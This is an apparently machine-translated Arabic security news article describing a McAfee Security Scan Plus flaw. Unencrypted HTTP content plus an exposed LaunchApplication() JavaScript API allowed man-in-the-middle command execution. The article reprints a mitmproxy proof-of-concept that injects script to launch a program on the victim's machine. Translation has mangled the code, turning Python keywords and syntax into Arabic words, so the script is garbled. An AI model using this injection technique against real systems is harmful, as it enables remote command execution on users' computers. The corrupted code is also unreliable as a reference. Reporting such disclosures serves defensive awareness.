الخميس 2 أبريل ، الساعة 02:32
منزل إنت برنامج McAfee Security Scan Plus: عندما يرتكب الأمن أخطاء

برنامج McAfee Security Scan Plus: عندما يرتكب الأمن أخطاء

برنامج McAfee Security Scan Plus: من هذا الموقع لديك اقرأ عدة مرات عن الإهمال الأمني. حان الوقت لمكافي. يُزعم أن الشركة تقوم بإصلاح خطأ في أداة Security Scan Plus المجانية التي تقوم باسترداد المعلومات من أجهزة الكمبيوتر المهتمة عبر HTTP ، أي بنص عادي.

يبدو أن الشركة قد نسيت ما تبشر به ، أو افترضت أنه يستبعد أن يفكر المرء في وقوع هجمات مباشرة على خدماته ، مثل المسح المجاني عبر الإنترنت ، ولكن أيضًا الإعلانات الداخلية وواجهة المستخدم التي تعرضها.McAfee Security Scan Plus

تم اكتشاف الضعف بواسطة SecuriTeam، التي تنص على أن أداة McAfee "تسترد المعلومات من نطاقات mcafee.com المختلفة وتعرضها على المستخدم ، عادةً في نافذة التطبيق الرئيسية".

نظرًا لعدم استخدام بروتوكول HTTPS لنقل هذه المعلومات ، يمكن تعديل المعلومات بواسطة مهاجم يمكنه الاستفادة من المكتبة التي تتصل بالأداة (MCBRWSR2.DLL) لعرض محتوى HTML هذا يرغب.

تكشف هذه المكتبة عن واجهة برمجة تطبيقات JavaScript LaunchApplication () ، والتي تعني بكل بساطة أن المهاجم يمكنه تنفيذ أي أمر يريده للضحية.

يعرض برنامج McAfee Security Scan Plus ، بعد كل عملية مسح ، واجهة مستخدم تشير إلى "مستوى الحماية" للهدف على عنوان URL التالي:

http://home.mcafee.com/SecurityScanner/SSBanner.aspx

يتم عرض المعلومات على شاشة تقدم الفحص عبر الإنترنت ، بحيث يمكن للمستخدم أن يعتقد بسهولة أن جهاز الكمبيوتر الخاص به نظيف بينما ينتهك بالفعل.

إذا كنت الآن في وضع المهاجم ، وكنت تقوم بهجوم MITM ، فمن السهل جدًا تشغيل أوامر بامتيازات المستخدم الذي قام بتسجيل الدخول ، والذي يكون في كثير من الحالات هو نفس حساب المسؤول.

يحتاج PoC الكامل إلى سطور كود 38 فقط. تعرف McAfee على المشكلة هنا وأصلح الخدمة في يوليو.

انظر رمز PoC

#! / usr / bin / env python3 # # وضع وكيل HTTP: # mitmproxy -s mcsploit_inline.py --ignore '. *' # # وضع الوكيل الشفاف: # mitmproxy -s mcsploit_inline.py -T # من mitmproxy import ctx ، طلب استيراد http استيراد وقت COMMAND = "c: \\ windows \\ system32 \\\" calc.exe "CMDARGS =" "استجابة def (تدفق): if flow.request.scheme ==" http "و (flow.request.headers ['host']. endswith ("mcafee.com") أو "mcafee" في flow.request.url): if flow.response.status_code == 302: ctx.log ("[+] [MCSPLOIT] تم العثور على طلب McAfee غير آمن! (HTML) ") https_url = flow.request.url.replace (" http: // "،" https: // ") r = applications.get (https_url، headers = flow.request .headers ، تحقق = False) إذا كان "text / html" غير موجود في r.headers ['content-type']: إرجاع المحتويات = r.text محتويات = content.replace (""، ""٪ (COMMAND، CMDARGS)) flow.response = http.HTTPResponse.make (200 ، بايت (محتويات ، ترميز = "utf-8") ، {"Content-Type": "text / html؛ charset = utf-8" ، "Expires": "- 1 "}) حاول العودة: if flow.response.headers [" content-type "] ==" text / javascript ": ctx.log (" [+] [ MCSPLOIT] تم العثور على طلب McAfee غير آمن! (JS) ") inject =" try {window.external.LaunchApplication (\ "٪ s \"، \ "٪ s \")؛} catch (launchapperr) {var x؛} \ n "٪ (COMMAND، CMDARGS) try: flow.response.contents = inject + flow.response.contents باستثناء AttributeError: ctx.log ("[-] [MCSPLOIT] لا يوجد محتوى في الاستجابة الأصلية!") يمر باستثناء KeyError: pass
SecNews
SecNewshttps://www.secnews.gr
في عالم خالٍ من الأسوار والجدران ، يحتاج إلى البوابات والنوافذ

اترك الإجابة

الرجاء إدخال تعليقك!
الرجاء إدخال اسمك هنا

أخبار مباشرة

Italy Coronavirus: هجوم القرصنة على موقع المكافأة لمرة واحدة

إيطاليا Coronavirus: هجوم القرصنة على موقع خدمات الطوارئ - تم قبول هجوم القرصنة من قبل موقع الرعاية الاجتماعية الإيطالي ، ...

WinRAR: تم إصدار الإصدار 5.90 لأنظمة التشغيل Windows و Linux و Mac و c

WinRAR: الإصدار 5.90 لأنظمة التشغيل Windows و Linux و Mac و Android: إصدار WinRAR 5.90 النهائي مع ...

LimeRAT Trojan: ينتشر عن طريق تقنية تشفير ملفات Excel

تنشر حملة جديدة برنامج LimeRAT Remote Access Trojan باستخدام تقنية تشفير ملف Excel قديمة. LimeRAT هو حصان طروادة بسيط ...

لا يعرف البنتاغون أين يرسل الغطس!

وفقا لكبير ضباط اللوجستيات في البنتاغون ، على الرغم من التزامه بإرسال ...

تحذير: حتى MFA يمكن "اختراق"!

وفقًا لخبير أمان ، تعد المصادقة متعددة العوامل (MFA) طريقة جيدة لحماية الحسابات عبر الإنترنت دون ...

كيفية رقمنة أهم الوثائق الخاصة بك

في حين أن هذا الأسبوع هو اليوم العالمي للنسخ الاحتياطي ، إلا أنه يتم الاحتفال به عادةً من قبل صانعي الأقراص الصلبة وخدمات تخزين البيانات ، من المفترض ...

Linux Mint 20 “Ulyana”: يأتي بدون توزيعات 32 بت

في الأسبوع الماضي ، تم إصدار توزيع جديد لـ Linux Mint Debian Edition 4 (LMDE 4). كما نفهم من ...

لجنة الاتصالات الفدرالية: من 2021 مستخدمًا سيتم التحقق من صحة المكالمات

أعلنت اليوم لجنة الاتصالات الفدرالية (مجتمع الاتصالات الفيدرالية) أن جميع مزودي الهواتف المحمولة وكذلك أصحاب ...

Microsoft: تأخير COLID-19 TLS تعطيل البروتوكولات

أعلنت مايكروسوفت أمس أنها ستؤخر تعطيل بروتوكولات أمان طبقة النقل (TLS) غير الآمنة ...

من المرجح أن يتم إصدار iPhone 9 من Apple في 15 أبريل

إن وصول iPhone 9 من Apple هو شيء ينتظره العديد من مؤيدي الشركة. لكن ليس ...